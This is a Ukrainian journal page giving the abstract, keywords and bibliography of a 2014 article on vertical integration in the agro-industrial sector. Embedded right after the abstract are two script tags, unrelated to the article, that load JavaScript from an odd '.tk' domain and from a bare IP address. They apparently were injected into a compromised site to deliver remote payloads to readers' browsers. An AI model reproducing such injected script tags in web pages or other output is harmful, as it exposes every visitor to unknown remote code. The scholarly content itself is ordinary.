ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 631.145:631.151.61
Аграрний менеджмент і підприємництво

Теоретичні засади функціонування вертикально-інтегрованих структур в агропромисловому комплексі / Ніценко В. С. // Економіка АПК. - 2014. - № 2 - С. 63

Узагальнено концептуальні погляди вчених-економістів щодо вертикальної інтеграції підприємств агропромислового комплексу. Розглянуто основні причини, мотиви, що спонукають до вертикальної інтеграції, цілі, яких прагнуть досягти суб’єкти господарювання, функції інтеграційних зв’язків між підприємствами, принципи створення агропромислових інтегрованих формувань, критерії, що лежать в основі способів інтеграції, типи інтеграції та організаційні форми агропромислової інтеграції. Аналіз різних підходів до побудови вертикальної інтеграції показав, що функції підприємства-інтегратора, в більшості випадків, виконує переробне підприємство. Також формування вертикально-інтегрованих структур у формі агрохолдингу на сучасному етапі розвитку ринкових відносин є найбільш ефективним та перспективним способом виробництва продукції у ланці «виробництво-переробка-збут». Розроблено модель побудови вертикальної інтеграції на базі сільськогосподарського підприємства. Табл.: 1. Рис.: 1. Бібліогр.: 22.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: вертикальна інтеграція, вертикально-інтегровані структури, агропромисловий комплекс, функції інтеграції, цілі інтеграції, принципи інтеграції, типи інтеграції

Список використаних джерел

 1. Агробізнес: проблеми, сучасний стан та перспективи розвитку: [Кол. моногр.]; за заг. ред. Г.Є. Жуйкова, В.С. Ніценка. – Книга 3. – Одеса: ТОВ «Лерадрук», 2013. – 578 с.
 2. Аксьонова О. Контрактація інтеграційної структури та його особливості в АПК / О. Аксьонова // Економічний аналіз. – 2011. – Вип. 8. – Ч. 2. – С. 23-27.
 3. Альянс [Електронний ресурс] // Википедия. – Режим доступу: http://ru.wikipedia.org/wiki/%C0%EB%FC%FF%ED%1.
 4. Войнаренко М.П. Механізми адаптації кластерних моделей до політико-економічних реалій України / М.П. Войнаренко // Світовий та вітчизняний досвід запровадження нових виробничих систем (кластерів) для забезпечення економічного розвитку територій / Матер. конф. 1-2 листоп. 2001р. – К.: Спілка економістів України, 2001. – С. 25-33.
 5. Гольдштейн Г.Я. Стратегический менеджмент: [учеб. пособ.]. / Г.Я. Гольдштейн. – Таганрог: Изд-во ТРТУ, 2003.
 6. Господарський кодекс України: Кодекс від 16.01.2003 № 436-ИВ // Відомості Верх. Ради України (ВВР). – 2003. – № 18,19-20, 21-22. – Ст. 144.
 7. Калашникова Н.И. Хозяйственные связи между предприятиями: содержание, функционирование, управление / Н.И. Калашникова. – Саратов: Изд-во Саратов. ун-та, 1988. – 112 с.
 8. Корнєва Н.О. Роль інтеграційних процесів у формуванні організаційної структури тваринницько-продуктового комплексу / Н.О. Корнєва // Вісн. СНАУ [Серія «Економіка та менеджмент»]. – 2006. – Вип. 3-4 (20-21). – С. 74-77.
 9. Котов А.А. Финансово-промышленные группы в переходной экономике России: автореф. дис. канд. экон. наук / А.А. Котов. – Воронеж: Воронежский гос. ун-т, 2000. – 24 с.
 10. Кропивко М.Ф. Концептуальний підхід до кластерної організації та управління розвитком агропромислового виробництва / М.Ф. Кропивко // Економіка АПК. – 2010. – № 11. – С. 3-13.
 11. Малік М.Й. Науково-методичне забезпечення розвитку кооперації в аграрній сфері економіки / М.Й. Малік // Економіка АПК. – 2010. – № 12. – С. 103-108.
 12. Нестерчук Ю.О. Організаційно-економічні моделі міжрегіональної аграрно-промислової інтеграції / Ю.О. Нестерчук // Економіка АПК. – 2005. – № 12. – С. 17-24.
 13. Пинкевич И.К. Виды и особенности интеграционных процессов в агропромышленном комплексе России / И.К. Пинкевич // Проблемы современной экономики– 2010. – № 1 (33).
 14. Попов А.А. Интеграция хозяйствующих субъектов: сущность, функции, основные противоречия / А.А. Попов // Вестник ВГУ [серия «Экономика и управление»]. – 2004. – № 2. – С. 22-30.
 15. Попов А.И. Экономическая теория: [учеб. для вузов] / А.И. Попов. – 4-е изд. – СПб.: ЗАО Издательский дом «Питер», 2006. – 474 с.
 16. Ушвицкий М.Л. Объективная необходимость углубления интеграции в агропромышленном комплексе / М.Л. Ушвицкий // Сб. науч. тр. СевКавГТУ [Серия «Экономика»]. – 2006. – №3. – С. 101.
 17. Формирования ОСУ стратегического типа [Електронний ресурс]. – Режим доступу: http://managemate.ru/obespechenie-strategicheskogo-upravlenija/formirovanija-osu-strategicheskogo-tipa/587-vhozhdenie-naprimer-v.html.
 18. Частки у спільних підприємствах: Міжнар. стандарт бухгалтерського обліку 31. IASB; Стандарт, Міжнар. документ від 01.01.2012 [Електронний ресурс]. – Режим доступу: http://zakon2.rada.gov.ua/laws/show/929_040.
 19. Harrigan, K.R. Vertical Integration and corporate strategy / K.R. Harrigan // The Academy of Management Journal, 1985. – V. 28. # 2. – pp. 397-425.
 20. Hortaçsu Ali. Vertical Integration and Production: Some Plant-Level Evidence / Ali Hortaçsu, Chad Syverson. – University of Chicago and NBER, 2007. – 48 p.
 21. Perner L. Food Marketing / L. Perner [Електронний ресурс]. – Режим доступу: http://go6internet.appspot.com/www.consumerpsychologist.com/food_marketing.html.
 22. Stuckey John. When and when not to vertically integrate / John Stuckey, David White // The McKinsey Quarterly, 1993. – # 3. – pp. 71-83.
Читати статтю: 14_02_64-69.pdf
Читати переклад статті: 1402nitsenko.pdf